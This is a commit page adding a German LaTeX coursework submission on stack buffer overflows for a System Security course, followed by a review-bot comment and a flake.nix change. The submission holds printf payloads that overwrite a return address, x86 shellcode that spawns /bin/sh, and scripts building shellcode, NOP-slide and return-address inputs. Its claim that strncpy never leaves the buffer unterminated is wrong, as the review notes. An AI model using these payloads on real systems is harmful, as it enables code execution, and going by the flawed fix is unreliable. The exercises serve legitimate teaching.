[Assignment-6] Task 5 and 6 and flake change
In Task 5 sind noch vier Byte nicht benutzt, die laut Aufgabenstellung scheinbar vorgesehen sind. Mit padded_password, saved ebp, return address und input komme ich auf 36 Byte, in der vorgegebenen Tabelle ist aber Platz für 40.
parent
8e4f6932e5
commit
0d1dcf5b1e
2 changed files with 177 additions and 0 deletions
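--- a/Assignment 6 - Software Security - Teil 2/abgabe.tex
+++ b/Assignment 6 - Software Security - Teil 2/abgabe.tex
@@ -0,0 +1,176 @@
+\documentclass[11pt]{scrartcl}
+
+\usepackage[utf8]{inputenc}
+\usepackage[T1]{fontenc}
+\usepackage[ngerman]{babel}
+\usepackage{lmodern}
+\usepackage{graphicx}
+\usepackage{listings}
+\usepackage{xspace}
+\usepackage{amsmath}
+\usepackage{algorithm}
+\usepackage{algpseudocode}
+\usepackage{xifthen}
+\usepackage{xcolor}
+\usepackage{pdfpages}
+\usepackage[a4paper,lmargin={2cm},rmargin={2cm},tmargin={2.5cm},bmargin = {2.5cm},headheight = {4cm}]{geometry}
+\usepackage{amsmath,amssymb,amstext,amsthm}
+\usepackage[shortlabels]{enumitem}
+\usepackage[headsepline]{scrlayer-scrpage}
+\pagestyle{scrheadings}
+\usepackage{titling}
+\usepackage{etoolbox}
+\usepackage{tikz}
+\usepackage{multirow}
+\usepackage{tabularx}
+
+\definecolor{keyword}{rgb}{0.0, 0.0, 1.0}
+\definecolor{comment}{rgb}{0.5, 0.5, 0.5}
+\definecolor{string}{rgb}{0.6, 0.1, 0.1}
+\definecolor{background}{rgb}{0.95, 0.95, 0.95}
+
+\lstset{
+language=bash,
+backgroundcolor=\color{background},
+basicstyle=\ttfamily\small,
+keywordstyle=\color{keyword}\bfseries,
+commentstyle=\color{comment}\itshape,
+stringstyle=\color{string},
+tabsize=2,
+showspaces=false,
+showstringspaces=false,
+frame=single,
+numbers=left,
+numberstyle=\tiny\color{gray},
+breaklines=true,
+captionpos=b,
+escapeinside={(*@}{@*)},
+}
+
+\usetikzlibrary{shapes, arrows, calc, automata, arrows.meta, positioning,decorations.pathmorphing,backgrounds,decorations.markings,decorations.pathreplacing, graphs}
+\usetikzlibrary{matrix,shapes,arrows,positioning,chains, calc}
+\usetikzlibrary{arrows.meta,matrix,shapes,arrows,positioning,chains, calc}
+
+\tikzset{%
+initial text={},
+state/.style={circle, draw, minimum size=.6cm},
+every initial by arrow/.style={-stealth},
+every loop/.append style={-stealth},
+>=stealth
+}
+
+\ohead{\parbox[t]{.5\linewidth}{\raggedleft \theauthor}}
+\ihead{System Security, SoSe 24, Assignment \thesheetnr}
+
+% Sheet number
+\newcounter{sheetnr}
+\newcommand{\sheetnr}[1]{\setcounter{sheetnr}{#1}}
+
+% Exercise environments
+\newenvironment{exercise}[2][]{\section*{#2\expandafter\ifstrempty\expandafter{#1}{}{\ #1}}}{}
+\newenvironment{subexercises}{\begin{enumerate}[a), font=\bfseries, wide, labelindent=0pt]}{\end{enumerate}}
+\newenvironment{subsubexercises}{\begin{enumerate}[i), font=\bfseries, wide, labelindent=0pt]}{\end{enumerate}}
+
+% Makros
+% MACRO for whole diagram
+% #1: total width of diagram
+% #2: total height of diagram
+% #3: nodes, paths, ...
+\newcommand\protocolflow[3]{
+\begin{center}
+\begin{tikzpicture}[x=#1cm,y=#2cm]
+#3
+\end{tikzpicture}
+\end{center}
+}
+% MACRO for path line shortening
+% #1: start coordinate
+% #2: target coordinate
+% #3: text above arrow
+\newcommand{\package}[3]{
+\path[*-{latex[width=5pt, length=5pt]}] (#1) edge node [above] {#3} (#2);
+}
+
+% Anpassen --> %
+\author{Benjamin Haschka\\Sascha Tommasone\\Paul Zinselmeyer}
+\sheetnr{6}
+% <-- Anpassen %
+\begin{document}
+
+\begin{exercise}[Smashing the Stack for Fun and Profit]{5}
+\begin{subexercises}
+\item Wenn das Programm mit dem Kommandozeilenargument \lstinline{$(printf "AAAAAAAAAAAAAAAAAAAAAAAA\xBA\xB0\xBA\xB0")} aufgerufen wird, wird der Kontrollfluss wie gewünscht abgeändert.\\
+\begin{tabular}{ |c|c||c|c|c|c||c|c|c|c| }
+\hline
+Vorheriger Speicher & Größe & \multicolumn{4}{|c||}{Vorheriger Speicher} & \multicolumn{4}{|c|}{Vorheriger Speicher}\\
+\hline
+&&?&?&?&? & ?&?&?&?\\
+\hline
+Parameter password & 4 &BE&BA&FE&CA & 0&BA&FE&CA\\
+\hline
+Return Address & 4 & ?&?&?&? & BA&B0&BA&B0\\
+\hline
+Previous Frame Address & 4 & ?&?&?&? & 'A'&'A'&'A'&'A'\\
+\hline
+&&?&?&?&? & 'A'&'A'&'A'&'A'\\
+\hline
+&&?&?&?&? & 'A'&'A'&'A'&'A'\\
+\hline
+&&?&?&?&? & 'A'&'A'&'A'&'A'\\
+\hline
+&&?&?&?&? & 'A'&'A'&'A'&'A'\\
+\hline
+&&'E'&'F'&0&? & 'A'&'A'&'A'&'A'\\
+\hline
+Local Variable padded\_password & 24 & 'A'&'B'&'C'&'D' & 'A'&'A'&'A'&'A'\\
+\hline
+Freier Speicher & & \multicolumn{4}{|c||}{Freier Speicher} & \multicolumn{4}{|c|}{Freier Speicher}\\
+\hline
+\end{tabular}
+\item Mit dem Kommandozeilenargument \lstinline{$(printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80AAAAAAA\xEF\xBE\xDE\xC0")} wird der Shellcode in \lstinline{padded_password} an Position \lstinline{0xC0DEBEEF} ausgeführt.
+Sollte sich \lstinline{padded_password} an einer anderen Position im Speicher befinden, funktioniert der Angriff nicht, da der Shellcode gar nicht, oder nur teilweise ausgeführt wird.
+
+\item \lstinline{strcpy(3p)} berücksichtigt nicht die maximale Länge des Zielspeichers.
+Die Funktion \lstinline{strncpy(3p} berücksichtigt die maximale Länge des Zielspeichers, indem dessen Länge als Parameter an die Funktion übergeben wird.
+\lstinline{strncpy(3p} schreibt niemals (inklusive Nullbyte) über den angegebenen Speicherbereich hinaus.
+Konkret muss in diesem Fall die Zeile 12 \lstinline{strcpy(padded_password, password);} durch \lstinline{strncpy(padded_password, password, 24);} getauscht werden, um die Sicherheitslücke zu schließen.
+\end{subexercises}
+\end{exercise}
+
+\begin{exercise}[Stack-Based Buffer Overflow]{6}
+\begin{subexercises}
+\item Mit dem folgenden Script wird eine Eingabe für das Programm generiert, sodass eine Shell ausgeführt wird:\\
+\begin{lstlisting}[language=Bash]
+#!/usr/bin/env sh
+
+# 28 Byte Shellcode
+SHELLCODE="\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
+# Padding to fill:
+# - 72 Bytes to fill buff
+# - 8 Bytes to fill the local variables before buff
+# - 4 Bytes to fill the saved ebp value
+PADDING=$(printf "A%.0s" $(seq 1 84))
+# Address of the start of the buff array / shellcode
+RETADDR="\x1C\xDB\xFF\xFF"
+
+printf $SHELLCODE$PADDING$RETADDR
+\end{lstlisting}
+\item Mit dem folgenden Script wird eine Eingabe für das Programm generiert, sodass eine Shell im Anschluss an eine NOP-Slide ausgeführt wird.:\\
+\begin{lstlisting}[language=Bash]
+#!/usr/bin/env sh
+
+# 28 Byte Shellcode
+SHELLCODE="\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
+# NOP-Slide to fill:
+# - 72 Bytes to fill buff
+# - 8 Bytes to fill the local variables before buff
+# - 4 Bytes to fill the saved ebp value
+PADDING=$(printf "\\\\0x90%.0s" $(seq 1 84))
+# Address of the start of the buff array / shellcode
+RETADDR="\x1C\xDB\xFF\xFF"
+
+printf $PADDING$SHELLCODE$RETADDR
+\end{lstlisting}
+\end{subexercises}
+\end{exercise}
+\end{document}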
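Review bot: The fix proposed in subexercise 5 c) leaves `padded_password` unterminated: `strncpy(padded_password, password, 24);` copies at most 24 bytes and writes no null byte when `password` is 24 bytes or longer, so the sentence that strncpy stays inside the buffer "inklusive Nullbyte" does not hold for the terminator. A later string read of `padded_password` could then run past the 24 bytes the table gives for it. I would change the proposed line to `strncpy(padded_password, password, 23); padded_password[23] = '\0';` and state the missing-terminator behaviour in the text. The C source is not on this page, so whether over-long input should be rejected instead of truncated depends on how the buffer is used afterwards. Both `\lstinline{strncpy(3p}` occurrences also lack the closing parenthesis and should read `strncpy(3p)`.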
|
@ -7,6 +7,7 @@
|
|||
assignments = [
|
||||
"Assignment 4 - Protokollsicherheit (Praxis)"
|
||||
"Assignment 5 - Software Security - Teil 1"
|
||||
"Assignment 6 - Software Security - Teil 2"
|
||||
];
|
||||
|
||||
forAllSystems = function:
|
||||
|
|